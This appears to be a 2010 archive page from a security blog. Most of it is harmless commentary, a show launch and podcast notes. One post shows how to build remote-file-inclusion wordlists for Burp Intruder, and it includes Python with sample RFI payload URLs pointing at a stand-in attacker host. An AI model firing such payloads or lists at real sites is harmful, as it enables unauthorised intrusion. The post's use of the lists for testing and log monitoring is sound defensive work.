Tuesday
23Feb2010

Practical Exploitation

Practical Exploitation is going to be me, explaining things the way I see the world, on whatever medium best fits what I'm explaining, be it a short blog blurb, a video of me, a video of a desktop, or just audio. There is no schedule I'll be sticking to, but I will guarantee you 3 things:

  1. If you want it explained and it has to do with infosec or hacking (I'll do my best on the hardware side), it will be on the show. Be it a white paper that you don't have time to decrypt or just want decrypted, a tool you can't figure out, or simply something you want to learn more in-depth. That's what it's for.
  2. No fluff, I'll get straight to how you use it or can understand the topic.
  3. If your bullshit flag goes up for even an instant, call me on it, and I'll either explain why I said what I did, or apologize and correct myself. You can email, tweet, PM, IM, ask a question on the tumblr site, or just haul up and punch me at a con. Either way, please take the time to tell me I'm wrong and why.

It launches today. I'll start with topics that I know cold, then move on to white papers that I thought were interesting but haven't read yet, hopefully intermingling anything you want to learn about.

http://www.practicalexploitation.com/

and email: questions at the same domain.

or call:  (503) 406-8249

-- mubix

P.S.  Room362.com and Mubix Links aren't going anywhere. If anything they will probably start getting updated more. Room362 with stuff I cook up, as always, and Mubix Links with anything I find interesting on the web.


Saturday
30Jan2010

@RSnake’s RFI List in Burp Suite

First of all, get Robert @RSnake Hansen’s RFI list here:

http://ha.ckers.org/blog/20100129/large-list-of-rfis-1000/

It’s a great list, but as soon as I saw it, I was like.. hmm.. how can I use that? Well, being that I am a Burp fan, I parsed the .dat with the following line:

cat rfi-locations.dat | grep -v "^#" | awk -F '?' '{print $1}' | sort -u > rsnake_list.txt

This pulls his list down to 906 entries which you can load into Burp and hammer away with Intruder. If it pops any of them, not only have you better identified what is running on the site, but you might have just found RFI.

But I wanted to take this a step further:

[image: export_search_results]

The OSVDB archive allows you to download their entire database of vulnerabilities (after signing up for an account). I downloaded the CSV version so that I could parse it similarly to how I did RSnake’s. However, it definitely wasn’t that easy.

I downloaded osvd-csv.latest.tar.gz, extracted it and ran the following:

cat * | grep -i "remote file inclusion" | grep -v ",0$" | awk -F "," '{print $13}' | sed -e 's/^"//' -e 's/"$//' | sort -u > osvdb_rfi.txt

Which got me close. About 3 hours of manual editing after that and I had another list of ~1750 possible remote file inclusions. Is this a foolproof way of getting every possibility from the database? Definitely not, but it’s close, and I’d love to see someone modify and tweak my bash line to get it even closer. (Or find a completely different way)
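As an added example (not code from the original post), here is the same two-step transform in Python: the rfi-locations.dat step mirrors the shell pipeline exactly, and the OSVDB step uses a real CSV parser so a quoted field with an embedded comma no longer shifts the columns the way awk -F "," does. Both input samples are constructed and labelled; the column index 12 (0-based $13) and the "last field is 0" filter are taken from the page's command, not from a verified OSVDB schema.

```python
import csv
import io

# Constructed sample in the shape of rfi-locations.dat: '#' comments and
# one URL per line with the inclusion payload after the first '?'.
SAMPLE_DAT = """\
# constructed sample, not the real list
http://host.example/app/index.php?page=http://EVIL.example/x.txt?
http://host.example/app/index.php?page=http://EVIL.example/y.txt?
http://host.example/site/main.php?dir=http://EVIL.example/x.txt?
"""

def dat_to_paths(lines):
    """Page's pipeline: skip '#' lines, keep text before the first '?', sort -u."""
    seen = set()
    for line in lines:
        line = line.strip()
        if line and not line.startswith("#"):
            seen.add(line.split("?", 1)[0])
    return sorted(seen)

def _osvdb_row(title, path, flag):
    # Constructed 14-column row; the real OSVDB export has its own schema.
    cells = [""] * 14
    cells[1], cells[12], cells[13] = title, path, flag
    return cells

_buf = io.StringIO()
csv.writer(_buf).writerows([
    _osvdb_row("Foo CMS index.php Remote File Inclusion", "/foo/index.php", "1"),
    _osvdb_row("Bar, Inc. Portal Remote File Inclusion", "/bar/show.php", "1"),
    _osvdb_row("Baz Remote File Inclusion (unverified)", "/baz/view.php", "0"),
    _osvdb_row("Qux SQL Injection", "/qux/login.php", "1"),
])
SAMPLE_CSV = _buf.getvalue()

def osvdb_to_paths(csv_text, path_col=12):
    """OSVDB step with a real CSV parser: a quoted field holding a comma
    ("Bar, Inc.") no longer shifts columns as awk -F ',' does.
    path_col=12 is the 0-based form of the page's $13 (an assumption)."""
    seen = set()
    for row in csv.reader(io.StringIO(csv_text)):
        if len(row) <= path_col or row[-1].strip() == "0":  # grep -v ",0$"
            continue
        if "remote file inclusion" not in ",".join(row).lower():
            continue
        if row[path_col].strip():
            seen.add(row[path_col].strip())
    return sorted(seen)
```

The de-duplicated output is a plain one-path-per-line list, so it loads into Intruder as-is, and the same list works as a watchlist when grepping your own web server logs for probes against those paths.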

Tuesday
26Jan2010

Security (CAN BE) an ART not a SCIENCE

This is far from a new idea; however, it’s not something that is easily provable. So I had an idea this morning. I posed the following question on Twitter:

[tweet screenshot]

You know what I got in return? A resounding “No” from everyone. (Well, I had one outlier, but who doesn’t when you are trying to apply science to prove art?) I challenge you to name another non-artistic career that people are so passionate about that they would stay in it even if they won the lottery.

Here are a few that I would like to highlight:

@schuetzdj

[tweet screenshot]

@TomSellers

[tweet screenshot]

@ethicalhack3r

[tweet screenshot]

@dookie2000ca

[tweet screenshot]

This was a somewhat surprising outcome. See a trend? Most people wanted to quit their jobs, and start their own infosec company. Why is this? Is it just “The American Dream” or is it because they are unhappy with the current people in leadership? Or is it simply the fact that they are hindered from actually pursuing and learning hacking/security at work? The world may never know, but I do implore firms to look at the retention rate of their _actual_ talent. (No, I don’t buy into the No Infosec Peep left behind bull).

There is a rumor that Google has a practice: 2 hours a day, you (an employee of Google) are REQUIRED to work on a project of your own, one that is in no way indebted to or owned by Google, even after completion. I can imagine the above answers would change if that were the case where they worked, if their employers fostered learning.

As a result of Infosec / Hacking being an art, do we have our prima donnas? Of course. But do we also have our Van Goghs and Michelangelos? Definitely.

But, time for a bit of a reality check:

@daveshackleford

[tweet screenshot]

Ya, you have NO idea what you would really do with millions of instant cash. I think the number is some 80% of lottery winners go BANKRUPT in the first 10 years. This is because you, and EVERYONE you have ANY connection to, goes absolutely crazy. To the point that there are lottery winner support groups.

However, the fact that people say it now, shows that they at least have the passion for the art. (or are just fronting)

Here are some honest answers to even out the tide:

@shmoosr

[tweet screenshot]

@Bolster

[tweet screenshot]

@andrewsmhay

[tweet screenshot]

In conclusion, I believe that hacking is a science, until passion adds the artistic fire to the mix. At least that’s what I think, draw your own conclusions.

(That’s another thing I love about this field, you are constantly challenged to draw your own conclusions, to think, to learn, to improve, to be… better)

Friday
08Jan2010

grmn00bs podcast

I was recently on the grmn00bs podcast; I had a great time, and I can't wait to see who they pick up next in their series:

grmn00bs podcast: episode 9

"When they were n00bs Series"

Show Notes:

hak5 is one of the original security shows. Rob has been featured on several segments.
Twit Netcast Network with Leo Laporte is another show that’s been around for a while.
Security Tube is the YouTube of security videos. This is where I’m at when I should be working. You might even find some GRM n00bs stuff rattling around there.
The Academy Pro is another excellent place to go for security training.
milw0rm has lots of exploits. It’s a good place to check out some old papers to brush up on security history.
NewOrder is another resource to get abreast of lessons learned in the past.
Jasager is the “Yes Man” Rob talks about in the show.
Chris Gates’s book list has some good ideas for security reading.
Syngress is a publisher of security texts. They have all my money.
Donate to Johnny Long.

Tuesday
22Dec2009

Linked in to Twitter

If you hadn't noticed, LinkedIn has started allowing you to link your Twitter account to your LinkedIn account. So, I didn't know this (since I opted out), but apparently LinkedIn will kick your status updates to Twitter... like when you get a new job...

Privacy settings out the window! Woohoo for Web 2.0!